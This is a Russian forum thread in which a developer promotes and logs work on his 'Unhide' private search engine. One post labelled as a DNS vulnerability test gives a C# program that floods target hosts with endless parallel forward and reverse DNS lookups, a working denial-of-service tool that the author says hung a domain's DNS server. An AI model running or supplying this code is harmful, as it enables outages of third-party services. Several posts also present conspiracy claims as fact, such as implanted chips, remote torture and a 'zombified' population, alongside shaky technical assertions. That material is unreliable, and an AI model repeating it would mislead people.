Персональный поиск без рекламы, отслеживания и сокрытия информации

Статус
В этой теме нельзя размещать новые ответы.

Talomir

Местный
Местный

Talomir

Местный
Местный
Статус
Offline
Регистрация
20 Мар 2021
Сообщения
17
Лайки
333
ЗАПАРТНЁРИЛСЯ КАК PUBLISHER

Две новости о поиске Unhide, вернее три.

Во первых, заработал DNS, хотя странноватым образом, я купил его за 2 доллара. Поиск доступен по адресам Для просмотра ссылки Войди или Зарегистрируйся и Для просмотра ссылки Войди или Зарегистрируйся, но при заходе браузером адрес в строке автоматом меняется на числовой, 83.229.83.68, можно кликнуть выше и глянуть.

Во вторых, я запартнёрился с баннерной сетью 33Across, не гугл, из-за отслеживания последним, разместил их код на страничке и жду появления баннера.

А в третьих, во время отладки проблем вчера, я засёк странный заголовок Host: fbi.gov в сниффере отладки сети. С чем чёрт уже не шутит? Поиску 3 дня в сети...
--- Добавлено позже: ---

ПРИМЕР НАСТРОЙКИ DNS НОВОГО САЙТА У ПОСТАВЩИКА ДОМЕНА

Разбирался 3 дня, наделал кучу ошибок, в итоге всё оказалось проще паренной репы и работает:

Для просмотра ссылки Войди или Зарегистрируйся
Для просмотра ссылки Войди или Зарегистрируйся
--- Добавлено позже: ---

Для просмотра ссылки Войди или Зарегистрируйся
--- Добавлено позже: ---

НОВЫЙ СЛИВ ИЗ СЕРВЕРНОГО ПОИСКА Для просмотра ссылки Войди или Зарегистрируйся

Для просмотра ссылки Войди или Зарегистрируйся
Для просмотра ссылки Войди или Зарегистрируйся
Для просмотра ссылки Войди или Зарегистрируйся
--- Добавлено позже: ---

ИНТЕРНЕТ ПОИСК UNHIDE: СНИМИТЕ ОЧКИ GOOGLE

Современный мир насквозь пронизан системами отслеживания, как пасмурный день - лучами пробивающегося солнца. Я привёл это сравнение не как комплимент технологиям слежения, а как аналогию, показывающую плотность слежки в общем проценте бытового поведения людей. Видеокамеры в городе, видеорегистраторы в машинах, системы наблюдения в магазинах, отслеживание и позиционирование в смартфонах и телефонах, скрытая прослушка в телефонах и квартирах (так называемые закладные устройства, жучки), троянские программы в компьютере и телефоне, и, даже, биологические чипы и имплантанты с радио-протоколами CDMA, VHF, UHF.

Всё это делается якобы для борьбы с преступностью, но элементарно позволяет злоупотреблять технологиями слежения. Людям, их знающим, и имеющим к ним доступ. Я не затрагиваю подробно тему слежки, пыток и убийств на расстоянии или управляемых имплантантами заболеваний в этой статье, а привожу лишь самое распространённое злоупотребление технологиями слежения и управления в быту: банальнейшее кукловодство.

Например, сотрудники полиции, хорошо знающие слежку и отслеживание, устраиваются работать в отделы безопасности супермаркетов и крупных торговых центров и начинают активно участвовать в продажах магазина. Их цель - прибыль, и используют они только навыки, которыми владеют, то есть слежка, допросы, давление на психику.

Вы написали на форуме, что переделываете телефон - в супермаркете, в отделе дополнительных товаров, через день уже лежит набор отвёрток под сотовый телефон. Вы решили купить новое компьютерное кресло - в супермаркете оно волшебно появляется на следующий день, хоть вы об этом никому не говорили. Вы поздоровались с охранницей супермаркета - она, шутя, приводит половину фактов вашей биографии и жизни, случайно проговариваясь. Откуда охране супермаркета известна вся ваша личная и сетевая жизнь? Вы когда-нибудт задумывались над этим?

Оттуда-же, откуда и полиции, из непрерывного отслеживания ваших действий, в интернете, в доме и квартире, в городе и за городом. В интернете отслеживаются все ваши псевдонимы, посты на форумах и блогах, в мессенджере и на сайте, в электронной почте и в текстовых файлах на компьютере, разрабатываемые программы и совершаемые покупки. И, даже, отслеживаются все посещаемые вами сайты.

Слежение непрерывно ведётся за почти каждым пользователем интернета, и для этого, кроме кустарных методов снятия отпечатков браузера, и инфицирования компьютера вирусом, в сетевые протоколы вносятся поправки, позволяющие отслеживание и переходы между сайтами, типа файлов куки. С этим надо что-то делать, иначе вы купите в супермаркете дорогой музыкальный синтезатор и не будете знать что с ним делать, а главное - зачем вы его купили, как это было со мной! И так будет каждый месяц, как только вы будете получать деньги.

Весь этот феномен управляемых покупок называется кукловодством, в котором человек является резиновой куклой, которой можно управлять и навязывать ей поведение, используя технологиии наблюдения и био-электрического управления, на современном модном жаргоне называющиеся кибернетикой. Именно против кукловодов, как типа, в первую очередь борется проект Unhide, и интернет-поиск без отслеживания является важным болтом в общем механизме сокрвытия личной активности и работы в интернете.

Интернет-поиск Unhide (Для просмотра ссылки Войди или Зарегистрируйся , можно кликнуть, чтобы посмотреть), имя означает 'найти сайт, вывести сайт из-под хайда, сокрытия', основан на идеях отсутствия отслеживания и цензуры. Этот поиск не записывает поисковые запросы пользователя в файл протокола и не хранит их, не сохраняет IP адрес отправителя запроса, не сохраняяет на компьютере пользователя файлы куки, не сопоставляет компьютер пользователя с его псевдонимом, фамилией или ID, не передаёт на сайты Referer при переходе из поиска, не подтасовывает поисковую выдачу под собранную информацию о пользователе, и вообще, не собирает никакой информации о пользователе. Его идея монетизации основана не на отслеживании интересов и намерений пользователей и впаривании им товаров под интерес, а на продаже своей локальной копии поиска, для компьютера пользователя, чтобы он мог просматривать интернет без отслеживания и цензуры. Этот локальный поиск на компьютере сам сканирует интернет, и поисковые запросы не передаются по сети вообще, это самый рекомендуемый режим использования поиска Unhide. Именно по этому его вторым названием есть 'Personal Internet Search' - поиск с локального компьютера, а не с сервера.

Второй проблемой, решаемой интернет поиском Unhide, является цензура. Пропуская весь сетевой трафик интернета через свой сервер, компания google может делать с планетарной сетью всё, что угодно: скрывать сайты конкурентов и неугодных политическим группам у текущей власти, накручивать популярность выбранных сайтов и партнёров, подстраивать поисковую выдачу для целей модификации поведения или психологического влияния на человека в информационных операциях и пропаганде, влиять на экономику страны, например с целью разорения, поднимать и обваливать акции компаний, при помощи выдачи позитивной или негативной для акции информации, и, главное, такой централизованный поиск чрезвычайно не надёжен: достаточно программного или аппаратного сбоя или одной ракеты-снаряда чтобы лишить всю страну и планету интернета! Если поиск анхайд будет установлен у каждого дома, то поисковая система станет децентрализованной и исчезнет единственная точка сбоя - центральный узел, такую поисковую сеть поразить намного сложнее, нужен уже миллиард ракет, вместо одной, такая децентрализованная система становится более устойчивой.

Поиск без цензуры unhide.site предоставляет найденные в интернете и добавленные пользователями сайты как есть, без сознательной манипуляции, без просмотра цензором, не запрещая эротику, взломанные программы, фильмы, книги и музыку. Он не отфильтровывает провокационные журналистские материалы, блоги, форумы, сайты, и использует принцип голой правды о мире вместо басен сказочников. Единственное, что поиск пытается убирать из своей базы данных, так это шарлатанов, кукловодов и информацию полицейского террора.

Внутри себя программа поиска основывается на группах параллельных потоков, пробующих порты 80 и 443 на предмет веб-сайтов по всему интернету, встроенном микро-http сервере для обслуживания поисковых HTTP запросов пользователей, чрезвычайно-экономном файле с хэшами ключевых слов страничек, позволяющем захэшировать весь интернет с домашнего ноутбука, и нескольких служебных txt файлов. Поиск работает стабильно на домашнем ноутбуке с Windows, эта версия стои всего $15, и более-менее нормально на Linux сервере VPS, этот поиск бесплатен. Пожалуйста ознакомьтесь с интернет поиском без цензуры и отслеживания Unhide, кликнув по ссылке Для просмотра ссылки Войди или Зарегистрируйся !
 
Последнее редактирование:

Talomir

Местный
Местный

Talomir

Местный
Местный
Статус
Offline
Регистрация
20 Мар 2021
Сообщения
17
Лайки
333
АНОНИМНЫЙ САЙТ В UNHIDE.SITE

Последние аресты за публикации в интернете могут распространиться с мессенджеров и социальных сетей на сайты. Как сделать сайт анонимно и доступным для прочтения?

Для этого надо решить проблему с анонимным хостингом, первое, и анонимным добавлением сайта в поиск, второе. О последнем я и хочу рассказать.

Дело в том, что для добавления сайта в google вначале для этой компании надо подтвердить право собственности на сайт, разместив на нём секретную строку, выданную google. Для этого надо вначале зарегистрировать аккаунт гугл, с фамилией, именем и отчеством и номером телефона. А после этого подтвердить номер телефона кодом на SMS. По номеру телефона, запросом в банковскую базу данных и в базу данных телефонной компании, полиция получает реальные ФИО владельца сайта!

То есть, абсолютно все сайты в google привязаны к настоящим именам и фамилиям их создателей, отсюда и аресты и сроки. Этого нет в поиске Для просмотра ссылки Войди или Зарегистрируйся, который я запустил с первого апреля для обхода цензуры. Сайт может добавить любой пользователь, как свой сайт, так и любой посторонний сайт, ничего подтверждать не надо. Добро пожаловать в поиск unhide.site, заходите, добавляйте сайты.

Для просмотра ссылки Войди или Зарегистрируйся
--- Добавлено позже: ---

Для просмотра ссылки Войди или Зарегистрируйся
--- Добавлено позже: ---

Сегодня пофиксал баг с зависанием поиска - не хватало 2 Гб памяти, выделил 3Гб. программа уходила в своп или снималась с выполнения. Ошибку искал 5 дней, правил и пробовал всё, сегодня вроде получилось.
 
Последнее редактирование:
DontWorry
DontWorry
Можно не добавлять сайт в тот же гугл. Через некоторое время поисковики сами находят сайт.
 

Talomir

Местный
Местный

Talomir

Местный
Местный
Статус
Offline
Регистрация
20 Мар 2021
Сообщения
17
Лайки
333
ИНТЕРНЕТ ПОИСК В ТАТРАХ - ГОРЫ

Я сижу в особняке в Словакии, во дворе дома на склоне горы, среди сосен, на фоне лыжной трассы за террасой. Никого, птицы, олени, медведь, три собаки с котом и большая семья.

Пью двухлитровый пепси за 0.89 евро и курю красный winston за 4.6 евро/пачка. На деревянном столе, перед кострищем, передо мной стоит широкоформатный ноутбук Lenovo, с этим форумом и моим поиском Unhide в закреплённой вкладке, я занимаюсь администрированием и доводкой своей поисковой системы PIS.

Словакия оплатила год проживания семье, из-за военных действий в Украине, и штаб-квартира Технологий Боттинга 12 год будет находится в горах - в малых Татрах, Словакия, это горы типа Карпат, только круче, горнолыжный курорт, на лыжной трассе до сих пор лежит снег.

У нужного не может быть не нужных последствий, и именно так исполняются мои мечты и желания - я мечтал о домике в горах, вначале в Крымских, но из-за войны получился в Словацких татрах. Медитативный транс, крепкий дым сигарет, смешанный с лимонадом и ноотропным эффектом, работа за компьютером, здоровье и сон. Добро пожаловать в мой поиск Для просмотра ссылки Войди или Зарегистрируйся без цензуры и отслеживания !

Для просмотра ссылки Войди или Зарегистрируйся
--- Добавлено позже: ---

НАСТРОЙКИ DNS САЙТА ДЛЯ БЮДЖЕТА $2/ГОД ЗА ДОМЕН

Регистратор namecheap.com, домен верхнего уровня (Top Level Domain) .site

Я неделю искал баг в коде, приводящий к зависанию поиска в браузере, оказалось, как показал Brave Browser, проблема в DNS, который я купил за $2 на год. Браузеры Edge и Brave, собранные на одном и том же движке, ошибочно кэшируют Dynamic DNS - новую поправку к протоколу Domain Name System.

Для нормальной работы домена рекомендуется выключить DynDNS и DNS Sec, а записи A + DynDNS заменить на A Record. Как на следующем рисунке:

Для просмотра ссылки Войди или Зарегистрируйся
--- Добавлено позже: ---

УЯЗВИМОСТИ DNS СЕРВЕРОВ ПРИВОДЯЩИЕ К DoS

В процессе портирования и наладки персонального интернет поиска с Windows на Linux наткнулся на вторую проблему DNS, слишком частые запросы к DNS серверу домена приводят к зависанию DNS сервера и недоступности сайта в браузерах.

У меня было 50 потоков, делающих обратные DNS запросы, для преобразования IP в domain name при сканировании веб-сатов в поиске. В итоге, сайт не резолвился в трети случаев и не открывался в браузере. Я добавил задержку между запросами 100 миллисекунд и сделал 10 потоков вместо 50.

Для эксплуатации уязвимости достаточно слать в вечном цикле прямые и обратные DNS запросы по IP/DNS сайта - они будут перенаправлены на сервер, ответственный за домен, и скорее всего перегрузят и затормозят сервер, сайт перестанет открываться в браузерах, ситуация DoS.

Простая программа на C# для тестирования на уязвимость (консольное приложение, файл Program.cs).

Запуск под Windows: C:\>nm host1 host2 host3 host4 ...

Запуск под Linux: mono nm.exe host1 host2 host3 host4 ...

Код:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Net;

namespace nm
{
class Program
{
static void Main(string[] args)
{
foreach (string host in args) for (int i = 0; i < 50; i++) Task.Run(() => Test(host));
while (true) Console.ReadLine();
}

static async Task Test(string host)
{
while (true)
{
IPAddress ip = null;

try { ip = Dns.GetHostAddresses(host)[0]; } catch { }
if (ip != null) try { Dns.GetHostByAddress(ip); } catch { }
}
}
}
}



Для просмотра ссылки Войди или Зарегистрируйся
--- Добавлено позже: ---

Вижу, что практически вылечил сервер поиска, ушла ровно неделя. С десяток поправок кода и поправки конфигурации VPS и DNS для обхода багов браузеров: проблемы кода были и у меня и в браузерах. Сегодня пол дня поиск работал без зависаний, кроме момента тестирования на уязвимость домена - тогда DNS сервер новых дешёвых доменов повис, и поиск 5 минут или более долго открывался в браузере.

Для просмотра ссылки Войди или Зарегистрируйся
 
Последнее редактирование:

Talomir

Местный
Местный

Talomir

Местный
Местный
Статус
Offline
Регистрация
20 Мар 2021
Сообщения
17
Лайки
333
ПОИСК UNHIDE.SITE ТЕПЕРЬ НА РУССКОМ И АНГЛИЙСКОМ ЯЗЫКАХ

Я поставил русский дополнительным языком в поиске Для просмотра ссылки Войди или Зарегистрируйся, он поддерживает два языка: английский, основной, и второй язык, дополнительный, локальный. Вначале дополнительным стоял словацкий.

Причина - администратору нечего читать в поиске, я русскоговорящий, хоть средне знаю ещё английский и украинский, но родной язык - русский, и я привык читать на нём. Как и половина Украины. В Словакии часть населения тоже знает русский, они изучали его в школах, в 80-е 90-е.

Так что теперь я сажусь за добавление основных русских форумов, что уцелели после конфликта, и основных русских сайтов - по моим интересам. Если у вас есть желание добавить сайты - велком на анхаййд, никаких дополнительных разрешений не надо!

Продолжаю борьбу с багами, аптайм сайта уже значительно вырос, после недели непрерывных тестирования и поправок, но, возможно, пофиксано ещё не всё. Я писал, что первый месяц поиск будет работать в тестовом режиме, доводки и наладки!

Для просмотра ссылки Войди или Зарегистрируйся
--- Добавлено позже: ---

РАСКРЫТЫ 3 СЕРЪЁЗНЫХ ОРГАНИЗАЦИИ УПРЯТЫВАЕМЫЕ GOOGLE

На сегодня поиск unhide.site раскрыл 3 серъёзных организации, упрятываемые google от меня в течении 20 лет!

- Агенство МАГАТЭ (регулирование ядерной промышленности и радиационная безопасность РБ)

- Корпорация РосАтом (строительство ядерных объектов, крупнейший игрок)

- ESA European Space Agency (Европейское Космическое Агенство)
--- Добавлено позже: ---

ПОИСК ТЕПЕРЬ ЛЕТАЕТ

Поиск Для просмотра ссылки Войди или Зарегистрируйся теперь летает, по скорости! Я не ожидаю от браузера ничего, кроме первого пакета данных, из-за чего сессия связи получается короткой и быстрой. Поиск стал мгновенно открываться и мгновенно выдавать результаты, а до этого в каждом пятом-восьмом случае происходило зависание на 5 минут из-за ожидания пакетов, которые не приходили.

Поправка стала возможной благодаря команде линукса tcpdump -vv tcp and port 80, которая показала трафик от FireFox в момент повиса форума. Так я вычислил основнейшую проблему...
--- Добавлено позже: ---

Мозилла не поддерживает универсальную кодировку Unicode, поиск нормально работает с Chrome, Edge, Brave Browser.
--- Добавлено позже: ---

Для просмотра ссылки Войди или Зарегистрируйся
Для просмотра ссылки Войди или Зарегистрируйся
--- Добавлено позже: ---

Для просмотра ссылки Войди или Зарегистрируйся
--- Добавлено позже: ---

ПРИМЕР СЛИВА ИЗ СЕРВЕЕРНОЙ ВЕРСИИ UNHIDE.SITE

Для просмотра ссылки Войди или Зарегистрируйся

Для просмотра ссылки Войди или Зарегистрируйся
 
Последнее редактирование:
DontWorry
DontWorry
В Мазилле
owcqk1Y.png
 

Talomir

Местный
Местный

Talomir

Местный
Местный
Статус
Offline
Регистрация
20 Мар 2021
Сообщения
17
Лайки
333
ЭСКИЗ ПЛАНА НА ПРОЕКТ UNHIDE.SITE

Ориентировочно, я хочу подержать поиск в интернете 3 месяца, апрель, май и июнь, и попробовать выйти на самоокупаемость за счёт продаж своих кульных программ с главной странички. Мне надо делать две продажи в месяц, чтобы покрыть расходы на аренду дедика, это под $30 долларов в месяц. Аренда домена стоит 15 центов, этой суммой можно пренебречь.

Дальше, я буду смотреть, окупаются ли затраты на дедик под поисковую систему, если да - дальше развивать проект, многое можно сделать. Во первых, можно добавить сервера под поиск по другим странам, кроме US UK RU. А во вторых, я начал делать поиск утекших и выложенных в сеть документов в различных форматах, и файлов, PDF, DOCX, MP3, MPEG4, etc. Добавлен расширяемый классами форматов хэндлер расширения файла, и надо дописывать скачивание и индексирование файлов для каждого формата. То есть я хочу добавить полноценное индексирование файлов, кроме html страничек!

Заходите, смотрите, в базе уже 8 000 страниц и каждый день добавляются 1 000 страниц, часть материалов вы никогда не видели в google: Для просмотра ссылки Войди или Зарегистрируйся

Для просмотра ссылки Войди или Зарегистрируйся
 

Talomir

Местный
Местный

Talomir

Местный
Местный
Статус
Offline
Регистрация
20 Мар 2021
Сообщения
17
Лайки
333
Talomir
Talomir
Talomir
Talomir
UTF-16LE не поддерживается устаревшим FireFox
 
DontWorry
DontWorry
Тут дело не в этом. А в том, что, как минимум технически неправильно использовать такую кодировку.

К примеру почитать вот - Для просмотра ссылки Войди или Зарегистрируйся .
 

Talomir

Местный
Местный

Talomir

Местный
Местный
Статус
Offline
Регистрация
20 Мар 2021
Сообщения
17
Лайки
333
ЗАРАБОТАЛ ПОИСК UNHIDE.SITE С МИНИМАЛЬНОЙ РЕКЛАМОЙ

Наконец-то, через 2 недели с начала процесса инсталляции, поиск Для просмотра ссылки Войди или Зарегистрируйся заработал в полном функционале. Вставить баннер мне не получилось, это связано скорее всего с двухбайтовой кодировкой страницы поиска Unicode, и код джаваскрипта неправильно читает код ID из своего тела. Зато заработала так называемая 'прямая ссылка', это рекламная ссылка, при клике на которую открывается другой сайт и начисляется небольшая сумма за посредничество. Ссылка называется Visit me и располагается над ссылками на мои программы.

Так реклама, автоматически в силу принципов проектирования, как их следствие, получилась максимально не напрягающей и вписывающейся в дизайн главной странички. Посмотреть можно здесь: Для просмотра ссылки Войди или Зарегистрируйся

Для просмотра ссылки Войди или Зарегистрируйся
--- Добавлено позже: ---

Сделал конфетку из прямой ссылки на главной страничке, приятно кликнуть :)

Для просмотра ссылки Войди или Зарегистрируйся
--- Добавлено позже: ---

И сделал рекламку своим программам более привлекательной, шо його робыты колы нема роботы....

Для просмотра ссылки Войди или Зарегистрируйся
 
Последнее редактирование:

Talomir

Местный
Местный

Talomir

Местный
Местный
Статус
Offline
Регистрация
20 Мар 2021
Сообщения
17
Лайки
333
Сделал рекламный блок немного скромнее, чтобы он не забирал всё внимание у строки поиска...

Для просмотра ссылки Войди или Зарегистрируйся
--- Добавлено позже: ---

ПОИСК UNHIDE.SITE НАЧАЛ ИСКАТЬ ХАКЕРСКИЕ САЙТЫ !@#$

Для просмотра ссылки Войди или Зарегистрируйся
 
Последнее редактирование:

Talomir

Местный
Местный

Talomir

Местный
Местный
Статус
Offline
Регистрация
20 Мар 2021
Сообщения
17
Лайки
333
СЛИВ ИЗ ПОИСКА UNHIDE.SITE
ВИРТУАЛЬНЫЙ КРИОГЕННЫЙ РОБОТ ДЛЯ РАБОТЫ С ВИРУСАМИ


Для просмотра ссылки Войди или Зарегистрируйся

Для просмотра ссылки Войди или Зарегистрируйся
--- Добавлено позже: ---

Исправил проблему со слишком яркой рекламой, сделал в разы скромнее

Для просмотра ссылки Войди или Зарегистрируйся
 
Последнее редактирование:

Talomir

Местный
Местный

Talomir

Местный
Местный
Статус
Offline
Регистрация
20 Мар 2021
Сообщения
17
Лайки
333
КОРОТКИЙ РЕПОРТАЖ ИЗ СЛОВАКИИ

Я долго думал, какой городок стал праобразом декораций к клипу Арии "Убить дракона". Оказалось - Европа, типичная Словакия, VELKA FRANKOVA или LIPTOVSKY MIKULASH / ILANOVSK. Население чиппировано, зомбировано, обработано и запугано, сидит дома и боится выйти на улицу, а если кого-нибудь встречает на улице пешком - угрожает вызвать полицию. Асфальт, дорогие дома, иномарки и богатая дешёвая церковь в каждом посёлке зомби, при этом уровень развития населения - где-то идиотия. В норме только дети и молодёжь, живо говорят, можно перекинуться, пожать руку и стрельнуть сигареты, есть остаток мозга. У остальных - чип давно заменил мозг, молчат, не выходят из дома, ездят в областной центр по компьютерному графику со стеганографией в номерах автомобилей, как в Украине (Киев, Хмельницкий, Чернигов напр.) или как в Москве, на компьютерном управлении! В общем, такая страна зомби, вот такая наладка интернет поиска из словакии поучается, из города зомби - в страну зомбаков перебрался :)

На днях был, кстати, в Кракове, в старом городя и в еврейском квартале рядом - классный живой город, Краков, сиги, энергетики, еда, пиво, движение, только рестораны очень дорогие. Краков всем рекомендую!

 

Talomir

Местный
Местный

Talomir

Местный
Местный
Статус
Offline
Регистрация
20 Мар 2021
Сообщения
17
Лайки
333
ОБЛЕГЧЁННЫЙ ИНТЕРНЕТ ПОИСК ДЛЯ WINDOWS PC

Спустил версию, менее требовательную к ресурсам, на библиотеке серверной версии поиска, которую налаживал 2 недели, со всеми исправлениями. Теперь комп с поиском или ноут не должен тормозить, поиск не грузит сеть и меньше грузит память! Скачать и посмотреть можно Для просмотра ссылки Войди или Зарегистрируйся Для просмотра ссылки Войди или Зарегистрируйся Для просмотра ссылки Войди или Зарегистрируйся Для просмотра ссылки Войди или Зарегистрируйся
--- Добавлено позже: ---

ТЕПЕРЬ С ПОИСКА Для просмотра ссылки Войди или Зарегистрируйся МОЖНО КОПИРОВАТЬ СМАЙЛЫ В ФОРУМЫ И МЕССЕНЖЕРЫ 👍🌺😻

Для просмотра ссылки Войди или Зарегистрируйся

--- Добавлено позже: ---

Можно добавить анхайд в закладки, чтобы вставлять эмодзи в посты на этом форуме 💚🌼💘
 
Последнее редактирование:

Talomir

Местный
Местный

Talomir

Местный
Местный
Статус
Offline
Регистрация
20 Мар 2021
Сообщения
17
Лайки
333
ТЕПЕРЬ МОЖНО СЛАТЬ ПИСЬМА С ЭМОДЗИ 🎉👍

Копируете смайлы и эмодзи мышкой и вставляете в сабжект или в боди письма отсюда Для просмотра ссылки Войди или Зарегистрируйся - оно получается гораздо приятнее! 🌼🌻🌺

Для просмотра ссылки Войди или Зарегистрируйся
 

Talomir

Местный
Местный

Talomir

Местный
Местный
Статус
Offline
Регистрация
20 Мар 2021
Сообщения
17
Лайки
333
🍺 ПЕРСОНАЛЬНЫЙ ИНТЕРНЕТ ПОИСК БЕЗ ОТСЛЕЖИВАНИЯ У КАЖДОГО 🍺

Для этого надо скачать инсталлятор и проинсталлить поиск парой кликов отсюда, поиск будет доступен на локальном адресе ноутбука Для просмотра ссылки Войди или Зарегистрируйся

Без отслеживания, без цензуры, без рекламы, без простоев из-за DoS атак, без прихотей админа и перезагрузок сервера. Вы сами можете добавить себе сайты для развёртывания, отредактировать спам-лист и выбрать язык информации, которая нужна. Это и была основная идея разработки - искать информацию своим ноутбуком, а не сервером, а может быть - я сделаю сканирование интернета и со смартфона.

unhide.site отработал месяц на дедика в trial period 30 дней, и я закрыл аренду, так как дедик стоит 22 доллара каждый месяц и прибыль с продаж программ эту сумму не окупает. Мне проще поставить поиск на ноутбук и не платить каждый месяц за дедик, я и так плачу за интернет и ноутбук обошёлся мне достаточно не бесплатно. Небольшие разовые затраты лучше, чем систематические отчисления за аренду VPS! Выглядит поиск на ноутбуке так (максимально не грузящая систему версия):

Для просмотра ссылки Войди или Зарегистрируйся
--- Добавлено позже: ---

Для просмотра ссылки Войди или Зарегистрируйся
 

Cherniyiastreb

Пользователь

Cherniyiastreb

Пользователь
Статус
Offline
Регистрация
20 Мар 2021
Сообщения
3
Лайки
65
А что ветка уже завяла, или что то случилось?
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху